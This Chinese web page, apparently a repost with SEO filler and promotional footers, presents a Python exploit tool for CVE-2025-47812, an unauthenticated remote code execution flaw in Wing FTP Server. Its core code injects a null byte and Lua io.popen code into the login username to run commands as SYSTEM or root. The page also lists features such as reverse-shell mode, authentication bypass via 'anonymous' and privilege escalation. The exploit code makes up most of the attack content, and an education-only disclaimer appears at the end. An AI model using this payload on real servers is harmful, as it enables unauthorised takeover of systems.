商务网站建设实践实训心得网络销售平台有哪些
2026/5/21 20:40:05 网站建设 项目流程
商务网站建设实践实训心得,网络销售平台有哪些,做民宿最大的网站,小型便利店装修设计项目标题与描述 CVE-2025-47812 - Wing FTP Server RCE 漏洞利用工具 本项目是一个针对Wing FTP Server#xff08;版本7.4.4之前#xff09;中发现的**关键远程代码执行#xff08;RCE#xff09;**漏洞#xff08;CVE-2025-47812#xff09;的Python利用工具。该漏洞…项目标题与描述CVE-2025-47812 - Wing FTP Server RCE 漏洞利用工具本项目是一个针对Wing FTP Server版本7.4.4之前中发现的**关键远程代码执行RCE**漏洞CVE-2025-47812的Python利用工具。该漏洞源于服务器认证逻辑中对用户名参数中空字节\0的错误处理攻击者可通过注入Lua代码实现未经认证的远程命令执行并在目标系统上以SYSTEMWindows或rootLinux/macOS权限运行代码。功能特性双模式利用提供直接命令执行与反向Shell获取两种攻击方式。跨平台兼容支持攻击运行在Windows、Linux及macOS上的易受攻击Wing FTP Server实例。自动化会话管理自动从服务器响应中提取UID会话凭证并用于后续请求。自定义载荷允许用户灵活指定要执行的系统命令实现高度定制化攻击。详细日志输出提供清晰的请求/响应信息便于调试与分析攻击过程。认证旁路可利用anonymous等用户名在无需有效凭证的情况下实施攻击。安装指南该工具为Python脚本无需复杂安装。系统要求Python 3.xrequests库依赖安装# 安装必需的Python库pipinstallrequests# 或通过requirements.txt安装如有pipinstall-r requirements.txt平台注意事项该工具本身可在任何安装Python的操作系统上运行。目标必须是运行Wing FTP Server版本7.4.4的系统。确保攻击机与目标服务器之间存在网络可达性。使用说明基础使用示例运行脚本后按提示交互操作python3 CVE-2025-47812.py程序将引导您输入目标URL如http://10.10.10.10:5466用户名如anonymous攻击模式选择1-执行命令2-获取反向Shell具体命令模式1时输入典型攻击流程信息收集确定目标Wing FTP Server的版本及可访问的管理接口。漏洞探测尝试使用anonymous用户名访问登录端点。命令执行通过注入的Lua代码运行id、whoami等命令验证漏洞。权限提升利用获取的系统权限执行进一步操作。API接口概览该工具主要与以下Wing FTP Server端点交互/loginok.htmlPOST请求提交恶意用户名载荷获取UID会话Cookie。/dir.html携带UID Cookie的GET请求触发会话文件处理并执行注入的代码。核心代码1. UID与恶意Cookie获取函数此函数构造包含Lua代码注入的用户名参数向/loginok.html发送POST请求以获取有效的UID会话凭证。defget_uid_cookie(session,base_url,username,command): 通过Lua代码注入获取Wing FTP Server的UID会话Cookie 参数: session: requests.Session对象 base_url: 目标服务器基础URL username: 用于注入的基础用户名 command: 要执行的系统命令 返回: 成功时返回UID字符串失败返回None urlf{base_url}/loginok.htmlheaders{Content-Type:application/x-www-form-urlencoded,User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36,Origin:base_url,Referer:f{base_url}/login.html,# ... 其他请求头省略}# 关键注入点在用户名中插入空字节和Lua代码encoded_usernamequote(username)payload(fusername{encoded_username}%00]]%0dlocalh%3dio.popen(\{command}\)%0dlocalr%3dh%3aread(\*a\)%0dh%3aclose()%0dprint(r)%0d--password)print(f[*] 尝试获取UID... 载荷:{command})try:responsesession.post(url,datapayload,headersheaders)set_cookieresponse.headers.get(Set-Cookie,)# 从Set-Cookie头中提取UID值matchre.search(rUID([a-f0-9]),set_cookie)ifmatch:uidmatch.group(1)print(f[] UID获取成功:{uid})returnuidelse:print([-] 未找到UID!)returnNoneexceptExceptionase:print(f[-] 发生错误:{e})returnNone2. 漏洞触发与命令执行函数此函数使用获取的UID向/dir.html发送请求触发服务器处理包含恶意Lua代码的会话文件从而实现远程代码执行。defpost_to_dir(session,base_url,uid): 向/dir.html端点发送请求触发RCE 参数: session: 携带UID Cookie的requests.Session对象 base_url: 目标服务器基础URL uid: 从get_uid_cookie获取的会话ID 返回: 服务器的响应内容包含命令执行结果 urlf{base_url}/dir.htmlheaders{Content-Type:application/x-www-form-urlencoded,# 设置Cookie头携带有效的UID会话Cookie:fUID{uid},User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36,# ... 其他请求头省略}print(f[*] 发送 /dir.html 请求...)try:responsesession.get(url,headersheaders)print(f[*] HTTP{response.status_code})# 输出原始响应其中包含命令执行结果print(------ 响应开始 ------)print(response.text)print(------ 响应结束 ------)returnresponse.textexceptExceptionase:print(f[-] 请求失败:{e})returnNone3. 漏洞利用流程主逻辑# 主程序交互逻辑基于提供的信息重构defmain(): 漏洞利用工具主函数 协调整个攻击流程目标输入、模式选择、载荷生成与执行 print(*60)print( CVE-2025-47812 - Wing FTP Server RCE Exploit)print(*60)# 1. 获取目标信息target_urlinput(目标URL (例如: http://localhost:5466): )usernameinput(用户名 (例如: anonymous): )# 2. 选择攻击模式print(1) 执行命令)print(2) 获取反向Shell)choiceinput(请选择 (1 或 2): )# 3. 根据模式执行相应操作ifchoice1:# 命令执行模式commandinput(要执行的命令 (默认: whoami): )orwhoami# 创建会话并获取UIDsessionrequests.Session()uidget_uid_cookie(session,target_url,username,command)ifuid:# 触发漏洞执行命令post_to_dir(session,target_url,uid)elifchoice2:# 反向Shell模式需根据实际情况实现print([!] 反向Shell功能需根据目标环境定制实现)# 此处可扩展实现nc、bash、powershell等反向Shellelse:print([-] 无效选择)免责声明本工具仅用于教育目的与合法的安全研究。请仅在您拥有明确测试权限的系统上使用。作者不对任何滥用或由此工具造成的损害负责。6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAPxOjJ5m5ttnEWSXfJFj0OX更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询